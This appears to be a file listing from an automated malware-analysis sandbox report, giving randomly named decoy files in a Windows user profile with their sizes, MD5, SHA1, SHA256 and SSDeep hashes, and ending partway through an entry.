C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\POBuKqk7p3HVpix_cM.mp4 59.78 KB MD5: a27dc2fbdfa0b0c147dc3b98ee2a933f
SHA1: ca04c1ad6daf8904bdcf120c27bd2bed7c98f116
SHA256: 76d4ac035751c5c60a078cd9664fff9dccbf048a303b3b7ee610e2bc1ffec1f7
SSDeep: 1536:sGK1OjEj+5Ycu/ntyENL1KyWCmrme2imADP+OkHtFVXhcC:sGZEjQ1u/p5zLMzd5huVhZ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\rM0K82IAegAWaw6N.swf 68.59 KB MD5: 784805168b65ba6d6698b86601508dc7
SHA1: bc904b610228367c8ef5832d2c576fc96759caca
SHA256: 2295cd45660605223195c968ecd8e6fab5bf362ad17b596108bc09f2d8fa4574
SSDeep: 1536:NP8w2xd0C7m3okEtpqKbA2RDQQg3sbQWKJtJQLbks8dc+oyh9Cg:NPCzm3orbP+QgkQWfLbksAHp
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\h4Ure_SWB.mp4 69.00 KB MD5: 37d021fb80eeaaa6f7bb733ca443bde8
SHA1: 4c928c206292eba61e4fcca489cd8161c17acc2a
SHA256: 9a425299b3b372d15b558a5659ca6dbabf79e57cd285dd91246919811b7fa28b
SSDeep: 1536:qd5KXIt4koTgT9Qv2uzKA7RNRDHwPYjAIv7eDQG33KDsO/B5PuB:qmXM4kn9Qrt7RNlHD7EQe3rIBIB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\RbKeEPsH8.avi 95.55 KB MD5: 54ee77b3900f71e3b8ea981c677bcb36
SHA1: 7a67123d46182f7c1475e634ffd99e7a6a391a6d
SHA256: c51d8a321503e583a56b554335ea24f35e421764d52d2065ed741f4626f0b13c
SSDeep: 1536:PytI6a45qkMYupJd3bbxf25dXHExV9Ezyx46KWYdmTDFTpXQQZQ2BKpyZrtvTLdP:KtXa4A7YupDbxkXMV9c4QWDn1QEKpybt
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\shUk4EGQd0zRO ddsru9.mkv 53.89 KB MD5: f0b3f294a6fae908efab306b202c5acc
SHA1: 9f36d3834f5f7879a85815763f3fcd1284d285d3
SHA256: 3f73ce353f090acce90d8508a9fcb7a99d834ba0355cd5f6777077469843c81a
SSDeep: 1536:+vSRhyQPFb+W3SILQyXz0PFjVM/xtnLZlf+G1G:+vSC6FbkyD0PcCIG
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact 1.23 KB MD5: b430a532ce6a034c600973a109724dcc
SHA1: 3908c795516d7933aff7e2aad13b816da133c8d3
SHA256: 7035e96b9896bebee20726d107665907170f760194d544484773b123be70039d
SSDeep: 24:2FzBPJU42yTuwcwDSjO2w26yXgxU0RCfbhve5P0T2Lm/CCUgASesbD:2FzBPJh6v8fXyNe5P0qLgCaASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7FXGdv.mkv 85.72 KB MD5: ee38cc0b8a5774d6997d0c5d124bf6c3
SHA1: 32df3de68a8d085c3e24ba0744031dc45f7722fb
SHA256: f22fed74dd53b67ee2a5a310c8fddcf501dadaf5d3248b60284a555733deeff8
SSDeep: 1536:Weqnc3KtQp8In+A6CBR184y1s1Z3wQ/5p1RAcByicGTy/rV6u:d3n+AtG4yg6Q/L16XivUh
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fn3wxYGSmK_5.wav 18.22 KB MD5: 8467247d3aa2299dbfe505c8af1b3076
SHA1: bfbcd6707563c6fc63aec1afd6390cbe82037724
SHA256: b6bf19a54ce77d73fef56b6c688d16679fd0d4429c81fab8db5ee6c6d8a8fd31
SSDeep: 384:HlBUPQ4x7szACd8yYV5W4ioZW9IlYnYEl69+h2cNunGFGRF23P:l+Ih8XV5P7GIELG+hbM2/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KdF36F.avi 47.48 KB MD5: 40cf3d41a16e3c08d6f8013381b277bf
SHA1: 0bfe2fba77b9b82073670ce6e5b84b4081d210cf
SHA256: 10d6715cc084586916a1113929c6aa178e02df158b1b263a1ccbab4feab3f41d
SSDeep: 768:gTriVEcGqooi2mZbxCP0w17+CKVO+V69K10uhkrzYWx84zm0FDBDxygoImpSxxRP:i+VEcdmZdGxsOdQOuhoFzm0hy9uyXTup
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kKP8D1f.mp3 8.50 KB MD5: 4dc96a5274db781d20e09c4855fb6cb1
SHA1: a846921b789042c673f2128570529e91ada9ffb9
SHA256: bbdd5968db17ace23c223b2468efcf379305801ea76f7bc3334de5788b571133
SSDeep: 192:KBMKBeXG7AuZlzQ73wjKOdUsY1o2k34BCR1pxTN0Q83KBT64+X:hKs/uz8zwj72U3jdCv3KY7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OjEEOfskM8q.m4a 37.85 KB MD5: f6f4e2e728c33a0b5a41141e4f380a37
SHA1: 9ef1fbb69e8850da016ec8e7324ab5795cc8f188
SHA256: b646a2d623fea1d0c7b5715311c63cad5265012e18c73608a60e4783a99ed84d
SSDeep: 768:SBIsorT3ODNscYADD2bktY5p5Qx8W+8q0W9zi9Bh1OX2GDEHkb/Qj8fcMe:SBaexIADD2Kad0izKBD5GA8oj8fcJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pdn3smOfWiyL_KFEcP0.mp4 27.79 KB MD5: 264e091114380baafff89db141d25992
SHA1: 76e8f15b76c525397525b427c76a26bbdeeefaa7
SHA256: 2af11c1052af492c1ec92083aeafa4f6ebc096f72beb694fca7e5ff5926febff
SSDeep: 384:FqwHtEhNyUDg30dfXcKeMMimnEB20Ku635s7RNFi8/+fbWcno1UwuL/z4J/NK:FNNp+g3yXfJMHnWK135s7M82G1Ozms
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xe1YhHNVlwT k.wav 53.85 KB MD5: cbf65452a12516ca22b07afeccff4702
SHA1: 18de8569262c47f236ef76e38bb2683e6a70e05b
SHA256: 7d8f509b06cc6f8e2e893c41f64c4dd7c4fa0310ded0760e94807c8a269ad442
SSDeep: 1536:Z7wFCssE+8XgrsggTng7cZ6vjH5AKr+ZA1l:Z7yCssh8XSxDvtRyC1l
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_34_nkr.wav 28.56 KB MD5: 1a8c8db87962593a2c8626f4ebcb9fdb
SHA1: ce3b5a3afee1768cfa52f9a0a2d2c155cc3612e6
SHA256: a6b60a6d5cf2ca8b4d8bb728fcba68e8453a84cd077978e129280a907bca8dee
SSDeep: 768:mCPVpN6VJl20at9yvwpIARgMDyA2FDTQEoj87WP:vfoVJM8I/6MD/2FDij8qP
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\2 YiCSGLLTlIDeQ.doc 38.57 KB MD5: 5e140f4c16e6e8569e01f255a18afe50
SHA1: 4f5a67d2a423cbc0ba254f5fc67d1d4d0a03b234
SHA256: e59ca436f8368dce6294be2ec79c3a1c60169fc308b96bbbe48c785fd0573290
SSDeep: 768:PHXx4exO3oXqoYYejt4m2L/ly2WL4Gli7OR+5qQ8fQ0u76g+JboUGo:vuke2m2pZ3cRfXBUUGo
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3fgk.pps 96.47 KB MD5: 225c4fd395afb49f3ba778796a7668b9
SHA1: f0410c548dcf56ce77b8526f97e5472d27631a13
SHA256: e2c3acb603d98e3e24c207ad98dbe1ad2a8ce056ce9799fdaf099a3afd3dcc7e
SSDeep: 3072:XQPfH8tC+OOjX2G6EWCNT+pwl9VMOA7FO9RA7Dz:XQnn+OOXC3pwlYOARQRIz
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EGkqtCRNREaQo4XfBL.ods 66.42 KB MD5: 3401452e027a9ac973c9a96aad512423
SHA1: 5a15ce200f09cdebe72b8098c2d70c371e6d0cd6
SHA256: 8561609812984941bd7ec2909b89d7ca3dbf01ec39170394107d33821078a362
SSDeep: 1536:7lE9H+sA3dWr/QriWvEC666GqcdcC96jSyyMZQcC1xPh7:pEZ+18kriKPvqcdcCGSgC1xp7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\k0bYHnrNfY0Z01.docx 92.27 KB MD5: e95278f9e1bece859c04a8c50738b0e6
SHA1: 99076f6955fc9091c22e080101e1ca43a4cf2b3d
SHA256: 94742a5955b195652d126efe5004904787b8157972298caffafc45bc1ea2ecd6
SSDeep: 1536:ttsvcrKAAs45RUh9RrAJBViR3VTAcror8neoVkPkm12+PkggMysdAdgObbN:tYmXAsdrRrEBV63VTAcrorGeqPm12+k5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NU9iOZGfDM.xlsx 80.06 KB MD5: d0b2ceced52547988fb438a78204be98
SHA1: a28b35d707ff1d84406d02ea5140f7e6ad752019
SHA256: c99641d4e2e18589d10359d9ef24f5d407a0465727d329fc6cdf39de2d22adb1
SSDeep: 1536:/6Lc/CNAX8TFDKh5cpS3wFGrzx+qGDXjt7/MLPcxieWcdC:/gdFeh5qS3wFGrt+qGl7ELneWkC
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ol37DpMB ADCzniH6.docx 49.42 KB MD5: bc841900e459fc79ad18b000383b1d3f
SHA1: 1219212c2fb7fd7781b64eacf94743fe092e1ae0
SHA256: 29713b958d66879f9e302fac148d7f7c3c7c52a2fc9bd663c082d7b39e285310
SSDeep: 1536:V2r81VoqfVzcffNW8+OeF1xLAYPTvfEnAH9LRDk:VXHlWY8mFTAeyA/Dk
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OlNTdQSKj.csv 24.41 KB MD5: dfd1a00ef877041177782b80821ac091
SHA1: ed9472d7ca1ab03c074811d541aa9c5625b1d3b2
SHA256: d600921e24dd7f2d9017772fd117ae344f688c2e7ec7fba663bc474272b34e38
SSDeep: 768:6Dw9kV//N8hO9atke+F/vtBTOH6O9DpJL8d:IV//ek9gkPOV8d
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rMkTON600uD2.docx 14.82 KB MD5: e6fb1206da7405c67b567d35ce2e96dd
SHA1: fa88ddcfc138b19234dd849773e2f39dba811c45
SHA256: 700b523d07da2e66702a0bf578945c81453114dca49ab75001f93c801c9ec5d3
SSDeep: 384:0ewMTVJ0KUncBQETP4tfNFfhRO0u1JoPnugh:CncBQETP4tfNpK0u10
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yBWTsx0.xlsx 55.13 KB MD5: 9183dd0e2ef827df40a8855edd3b1c83
SHA1: dd60d6f2422a99544e6dca0953e1dd51eda8dd61
SHA256: 32036aa124e7093d9057bfb80252e4f03a6011638d6abaae6cab8a5d0928702b
SSDeep: 1536:NMe92juT0RIVwAn3gxKtf3s9M2XWv558EN:meouTZwAHtfsO2Wf8EN
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\3lDgGO6UTyrOsMHE.mp3 21.71 KB MD5: 400bd5cc32d07e77ba3857072940000f
SHA1: 8967653cf03fb6ef8bf873896d9b9cf6397d9a49
SHA256: c80f63ee419aa8c0f5e356987b44a1cf1b7078403d58256107a7a6941c070fac
SSDeep: 384:EYbE1OvpqEIg2keAfr2MtckerkguNmhRSO3372teohvaBft14POs1qq8kW:EpkvkEzKY2MterkgHRSO3CgAvaiqqM
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\Fnpi8zzFvSVq9mHNij76.wav 13.48 KB MD5: 1399415551397a3a37c0401e0a094bdf
SHA1: c0f982fb2ce58a4342a461be981df63c30dbbd72
SHA256: 040d4ebc5a1823c52c8708a92c9d8293493f6bb69c83347194ff8534b6161594
SSDeep: 384:PG5FoIJxYt1j4K3ilrNZmeN3TxC19LGahCc:uboIskJzATh7sc
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\HX-X27lPA60A4.m4a 75.24 KB MD5: 960f3ee367671c3b6b296c37a0374818
SHA1: 08b58b4abd47c2aab25abda51ae7d630173e613a
SHA256: f7f37063046a504960dd80d0dd38f804c74e358209b780c973e3a44b0731248a
SSDeep: 1536:iCdPpTnllUnZJ3FOZSCH1p7LMxYUbbF98PvcsHOuI/fdYMsI5Ad/LKdrTBL0:nPNllsAS41pLMx3grAH6/LKVTx0
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\i0vpbCxKUDj27FIiTrf.wav 1.32 KB MD5: dc023afc938307ceb60ae2ee38f4a2ca
SHA1: 9e18d8377b0b3b746948549c56d925e5bdef48a5
SHA256: 94c228faf47452173f1e66929c51476e656c8165cd32787bdbfa499bedab1fb5
SSDeep: 24:5SUCdEBJaiRxBzF3rf5KyrjDbEwyI7Z09irbh1W/e/TfMJASesbD:cunTzF3z5KYDwMZ09SbTW/gTEJASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\KbAGa_jf9A0p1.mp3 17.46 KB MD5: 01019a4a3526e2f12f5675d9fc792194
SHA1: 3dcd00af8fe143d84879d61c3b65e4d49ddeb2ed
SHA256: 144972a9c3ac29dfaa95496ed7ff425d087e23146083aafe2402b541dc6e35ee
SSDeep: 384:j/GwEgtM+r67S6YhFxcstRskE691vxlWG//YPsOWBTxHUOQEsYpkw:/tNWu1PcstRbE691vxlWG/TBFdGw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\nexJic6.wav 87.04 KB MD5: 966eb4c59475ca28aa410b385857c288
SHA1: 2a14015bfc679f89162700568aa996a15d92f6b6
SHA256: e2ebace599efde031e66d2f1e7c7ee95cd50fbd70135ef5afe1edec83598a426
SSDeep: 1536:xNPoxibM3cWoMsgYNhhBls3zUFE0E61DqWqzrkY6JFktAoQ+Po14ni3U:/PCib0sMmjhHO6E41WfBItodQ14nik
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\ucbmmg-N-J.wav 51.13 KB MD5: ca7f726574a4263385be81a3e767efe7
SHA1: dcd48ca45bfee6bd9c80fc23fa6be58329aa9e55
SHA256: c2ddb89d543ba7a14a54fe8d10b069ce1a0a007b8243de393665f7a11094d7bb
SSDeep: 1536:hDL7bNOizU1xSeSHNOP6KeimVRtPUMkNczelliEg:hzbXzU1oMTtcB4N0emz
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\wEWdm1lt.wav 23.34 KB MD5: ea52e6e60309be9b489895d31d54c2e9
SHA1: 26ba6a53c2b879b740353566e967aa609bafe7af
SHA256: 912e5dbc29566ef13cc914f94aa9f4b67b59238db4e9d37530849fcd608d6272
SSDeep: 384:nBdtDp4LnsR8E/WFnYdkARNAwU/mlE++gUngtedfDp8oVfkgHoQdEg/c21mkoS:nBLDS7TFnYPA//0+g8xdfD+oViEEg/ci
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\wHquroq M2bDSunIrjJ.wav 34.66 KB MD5: ea48a62d7f60e83a223d5c724b580a69
SHA1: ae92597083873caae1dd250f3dc2be998ce9e781
SHA256: d745488601859a6040c9e1da40234da6a82834f3b3b55ee05d50c8961a347ca6
SSDeep: 768:tdyBsa9Gt/ZpKg63VNcgAq+h+OVTDLoEMa9WDtl/ZhS0ju7EzAGm:DyBNY/FIVNVQb7LMtlxhS0S7EzRm
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\_9l8.wav 20.99 KB MD5: 3b5cbe305a7e96753e63909e51547121
SHA1: a1264cd9503c7684ddeee9c7018d15f8340ec30e
SHA256: 42260742c32983508503cef635e34829dddfd4be24d12b1e19ecef73ab539ed3
SSDeep: 384:G5JWuVjiWWR3Olles1f5AKeGrG48omQh/3Y0z7ZkuiJ7xa8B7g5YVfvt78sGRSX:fcjidR3q1f/eG8eh/z7Ze7g8tg5YVSsb
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\jMNoGbN.gif 18.21 KB MD5: 78ecf9dfef979ee90da5b9629d86e82a
SHA1: 0bba239173a6415fbc7091f674290837e1956724
SHA256: 70caeaf7de86757aebbf84dbf458eeb5aa2508f04b96da7aa209793957375878
SSDeep: 384:Vzu9kPFI8+GYs3OzKePLbwlBPQ36jbL/TfoibUlKVsFvttWq:g9kPW3VIOjPf2dXf0ptAq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MCZaDa0QQJ6wcNZUXn.gif 36.20 KB MD5: 8322d67adcd4cab36480ed7fa3ea80c9
SHA1: b46bf4d931122883621d3694ad600f9625acb45c
SHA256: 34b6d05af5a357d6ec2f296ab3f8d487f13b5ce98b2adb3dfb951b7aca5ec40e
SSDeep: 768:0/WGh2eksvErXVW2wm1b14NHrKUK9wWEUouLX+Y2:0/WGNgDHRyQrrX+Y2
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\QoXfvFeQOhQIV.png 2.93 KB MD5: 944aa30f4c25c8d6d53755a8e6fc1156
SHA1: e89061b2d5d4d700536b6d93c5ab1e8b33b8e7ab
SHA256: 93f4d1cae005b17d3a1038876e2278873b88fe5f16fc87cfd526f96ef01b7164
SSDeep: 48:yCXlHaG6UHRs0QJK/m+o22omnr3tw8y3RLDHPDQmY8VXTyaN8u0RtjScWL4BA5GF:VXlTRs0QJqOr3tw8w7KcThEtScWL4BU8
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\S4GQ2GGMfzy1DKUl.png 25.94 KB MD5: 69784f0217b8aacdff5c370c0e10e4e6
SHA1: 867f7ded76cb48421f06c332929387dd4b22d531
SHA256: 692998203c929c8553d25020f897449c9b411488dd858d72deddf213b6937af7
SSDeep: 768:VhAolBFQgdALdPhiDM7u6A3x7Vz4xdSFcX9sog:rHbjALdPhiw7u6whVzSdoymN
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\y18suG.gif 91.37 KB MD5: 80d20be50af8c7c51767cf8d07f0b321
SHA1: 72c766d82e4e7164d9c649f2c56ca1556421684b
SHA256: 9326e78b9ac9eaf19faec391a827651beede1a4ff68b11f0ae3e651471c6aaf1
SSDeep: 1536:qbQJaGD/qB07lvvin5BPMeqP+xlRRUHKpOmVWkgLc1tvcEkom/2krCmoAqmYiRWK:qbQQOqolQmeAQhg3KrvPkLOshow0vmJ/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M45yR7c437.avi 29.10 KB MD5: d1ea1a76a175dfbc7b1373b148c104b2
SHA1: 0998182fb7b9bf9bc72d75e8fff31cedc98bc6d4
SHA256: 8d5eef9d72bd6d76591b5f5057d2a5c7989b20447df2230d8b87cd6a85ec380c
SSDeep: 384:SjE8dm4VZ8YKOg8hSFgdfXGB84JtKTaoSDVz9bkB7wv8AAan1vGB3:WEcwhB8VVsyaVDVz2BsTAan1OB3
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\am8f6gN_e89TbRknT.wav 36.08 KB MD5: 88f64d3b0565fd747ad98a96b7d257c8
SHA1: ee17469a88476b37f90dd50e8a9f1761204b261c
SHA256: ad318ec7dad2be065932d32492bfe43d4a14891906ff6dabd781a409b74a1caf
SSDeep: 768:mWWK+pw7ktq/FB7ntHN28iGVNE8jsq98DlbXr/OFF1fQXx6iC:mjpw7ktqTjtZiAO8jsq9KlbjOXNQXVC
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\4_mbPPGlzHp_oUuJ-H3Z.bmp 34.42 KB MD5: 8e4847dce5b97081fe2064498abff925
SHA1: a547e4afab312c0a0581bc54a88db9eff08a0a86
SHA256: 58927b24f4a6eda348bf96d27af170aed63d1248ebfc2c3e0edafbfd0373f126
SSDeep: 768:cUL8WWC56kmAsJQNEDGCdw7fFYnKProylsj1N+oYEuk:nIC56kmAKQNEDTdw7fnDls6HEl
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\eMppgNp_d0eONIt.mp4 96.71 KB MD5: e587b0a838b4b52b68f33346f8605f00
SHA1: b61e4907ab6e2824c97e57430c78318376b0a792
SHA256: e887072f7f025a5155efc7df3605e3df0c375c4076dac574e61510e61e3cac66
SSDeep: 3072:TXnXEaZo/E2G00pXO5j5eRgxi/DOV7b22:TXNP2GvXqj5svOQ2
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\ok1IxJmM0MNDy1z2SKRW.odp 7.51 KB MD5: b13c4142f6535fbcc9f4e6e918b72fd6
SHA1: 048c1c63b5701549e7ac975aa7610fdbc53ea0ae
SHA256: 2cb5d7d7fe427e73aba450b2de6bcec5ed71673e3bafe73a1331d1784992e9b5
SSDeep: 192:NyNw1zEeiS8WY/jAiUenm3w0dORNfb3u5j5ZnJIL0pv1CwmAYLizOuV:Nye5EVS8JkiUGcw02fbezZeHhtOr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wpZkXn.mp4 55.67 KB MD5: 0099dbe4330e95d8aaae64cbf5b69f88
SHA1: b073d1361650f1db0ebd65b2dd91aacbb64e4891
SHA256: fa8f530c03b21ce91f8d2a70ba9881fb58d95371a4d02f55f884c350fcf7d386
SSDeep: 1536:RwPP919CEWj+oGViS+MRL20smHrONnoZbw1iXby7iO:yGEU21rLOSZs1+O7iO
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\68l k.odp 30.90 KB MD5: 3153dabac9ad6354f4ce50a3810dbfed
SHA1: 4278d661e9bbcd4d3af837f70c99c1bbace497d4
SHA256: 960e9d81b970bb99b5481626f102519059c5dd23edd02602d889c3dd80fb5209
SSDeep: 768:CjKGmNE3g0drCbSaFHKP3vY8vh+1MtqnFBibqMA5:CHgmhSFHKY8OMkF4bK5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url 211 bytes MD5: 786702269a5d3c946d5a6d9c4290a038
SHA1: f85429fed679befb11968cee874a55c364808ae3
SHA256: c2e134fb783bf97c0029aab00d4400e570a86cf866aa7f8ab6a1f6ca6bb84167
SSDeep: 6:Jnj6/BPUn3fTDJEP0udkqSMeEPh7Wcii96Z:lEc3fTtEP0BqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url 211 bytes MD5: ba29779ff2e0ee9c63881b82414c7817
SHA1: e6b99ff29f9251dcdfd99b59691ffd90d0486b01
SHA256: 17219dc2233bc980c21ab522dd5b7b94cba82f3683515068ac20828a5a8f9b4b
SSDeep: 6:Jnj6/BPUn3fTDJEXT+RudkqSMeEPh7Wcii96Z:lEc3fTtEiRBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url 211 bytes MD5: 9f67f9fb6faa065ea859a6fd12352372
SHA1: bbfa8497f422f7cab00170f74c93f7338759af22
SHA256: b32040b1aeaaccac0711fa3ae323fd69f4db295a84f3118f4000f52fad7778af
SSDeep: 6:Jnj6/BPUn3fTDJEk76udkqSMeEPh7Wcii96Z:lEc3fTtETBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url 211 bytes MD5: 8afd56f9bcbf1c4d21f1e2bd7ae4e6f0
SHA1: 41bc8f23f7decbead65ca26dee0815da9616aec1
SHA256: 2000969331884a5e8650b95157a6870b4b7fcc40062390fbfd224760b0aa279f
SSDeep: 6:Jnj6/BPUn3fTDJEk7XgYudkqSMeEPh7Wcii96Z:lEc3fTtE0BqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url 211 bytes MD5: 487d84485ed1e57b4df93abf173f80c5
SHA1: b6d5bf286bacb0455e19daee1b0e8dcf843f5659
SHA256: c1e1cfab4a9fbaff245bd0bf45e12609db30e8c2165756f21cf2289646d67d07
SSDeep: 6:Jnj6/BPUn3fTDJEkSYudkqSMeEPh7Wcii96Z:lEc3fTtE1YBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url 211 bytes MD5: 2e1c0543a131e66d546f46c5fa4bad05
SHA1: 6f1e29ec0ed00435b76ea96b237a852052740af2
SHA256: aa16ae4bb0e8069cdd77a6f75e8b1e1196cd32dc4b9db41629c5dbe809bf8ce4
SSDeep: 6:Jnj6/BPUn3fTDJEk5Z+RudkqSMeEPh7Wcii96Z:lEc3fTtECARBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url 211 bytes MD5: dddf68f82863a8b2d5f686f182352537
SHA1: 7ed46102603fd6c9b1482f1353196cd71957f928
SHA256: 15ed0eb57e3e55d9f44404447788f28deb902a17b8419041f38851716279ef87
SSDeep: 6:Jnj6/BPUn3fTDJEkqrYYudkqSMeEPh7Wcii96Z:lEc3fTtEpYYBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\MChYwIiGCBst93Q.wav 25.54 KB MD5: 2526c7333349b83a4181c1fc22f3864f
SHA1: 1b71baf99312c9e900aeb3abb943eb3136054c63
SHA256: 8741cbdfbbaa55408e05f6dd0f2ae3dd201cec2f6d95e5f129da8557102f363d
SSDeep: 384:XUjVIiMAhhyCmnQpvC65KXvHDZlBMApOlX2mU/0ISeKA1dsx+/rBIjvx6cctX:km9khZx1Xc1QAG7I7N1YuBI16xX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\twAQxH8FOS.m4a 21.87 KB MD5: 4130b2307ab86ceafef768fa446e6164
SHA1: 32d7267d53bcd6dac1624dbd921d2d5bbe7af0df
SHA256: 166b046fbd8be87e0c45d11b62be582f7a8436d58a7520726d1cece0bcbd3085
SSDeep: 384:9U45r09ooSV45oSbXtrASd5Z8dUbP1UXiC4ZH84yZMi:9UDSoSV4T9rAYz8mj1vtZH8vMi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\AfHqN B.gif 74.51 KB MD5: cc3ea809425bcb2afa051a609e2d8237
SHA1: b1433efbceb1cf0730da3f0a3b167cb0b77c8391
SHA256: 3124694a2e8fba2dda837e636db4bb640ea94f26565d5e24946638bc26ff60e0
SSDeep: 1536:YVf0WAc5SAkGfmN9VQJ9XT2z8nrKLUiEuPhrlvFRjQOtPXh9s7:Yp0WAc7efyj2zI+LU3uPhFIOtPXg7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\UYXfotd1.png 99.97 KB MD5: 85ae48128d696a6f1041ca14e787938e
SHA1: c982f6b7c93ad9b47cbbb9de06d67660e2a7d3ef
SHA256: 1fde54035a598177cef4833f096a78c38c3fe30486b1abf927ba1544d5008c6e
SSDeep: 1536:e+bywb3ud2uSxxZR0c0ZTeViTBvio1dSCXxS+l3OJBQKnObZEuj7nNrKmWgbm:eRwbmIV0tfZjnrS+l+JVObZEuXNer
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\v9Hxi uz2vt-5XDoxdC.bmp 46.89 KB MD5: 8e2a383651d0f976c4a65f7ec62f3245
SHA1: d4ae9be2bec7dd53496ddb2303048c77ed239bb6
SHA256: e353f1af148a7077f8d356f6909c26aabc91be97001985e1c2fffdf88972c291
SSDeep: 768:7fBdUq/12nBvoRKypCloEG46UCafS90/fFRIABulh2t67iJXJ3iLJvBeYvGfczAx:bU8kBgpClPh9fSa/fFRDBuStVJ2tmfcI
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\IE-asuVeDit5fMSdkB0.flv 42.38 KB MD5: 38e919a2dfe48fc6708e1896a88f41b7
SHA1: 4393e159d9da36b2ae91c921526085f91bc8eb5c
SHA256: a5ea6cf0675884b1d2919087611cebfe8cb0eefa0d1ac7abe01ebd070336d0c7
SSDeep: 768:cOUGBjYv1ym8mggzWl6pJT4YjgsgL7tDdkI/6Xu/TK5uWQdVMGxFHvnAX:cOrjYUm8mggS6pFFgLxDd/655ulx5IX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\F0eUqh0cOkUTa7DO.docx 74.37 KB MD5: 2738515c7d6579e640e995d114d97525
SHA1: e6b59e26ece4e0a12964ca42d6a2f3f335b0ddb3
SHA256: c89a26e2a731c1036955ba35f249190c9ddc145b92a849238ee949fd55b6d42c
SSDeep: 1536:sFVQGpGJNxHwhxu7YA6MOFq1dP0MxVwCZWjjWrhbNUn//9D3lO0c62:AGJNXYAaY1dsMTwCZ2WlhUnzY62
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\FN--.ods 83.57 KB MD5: f0840d2cb218212f83743ff6964b7340
SHA1: 81fb44c2894fb02adfb21c0eed45c47ac515e329
SHA256: 890d44ae4d6976dde372420aae94080c6e5e71b4c611d09b6283e22ed87d98bb
SSDeep: 1536:Ai2bSh6h3bowisl1a99OEFm1NdtNLbyIlkdCnIIWxUVY5n0eW4xIiUpyGh5:ADVQItLdOxGY5rWdLp/r
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\K_RwYW.odt 48.14 KB MD5: 43fd92fcdb4de2ce54f3596f042590ac
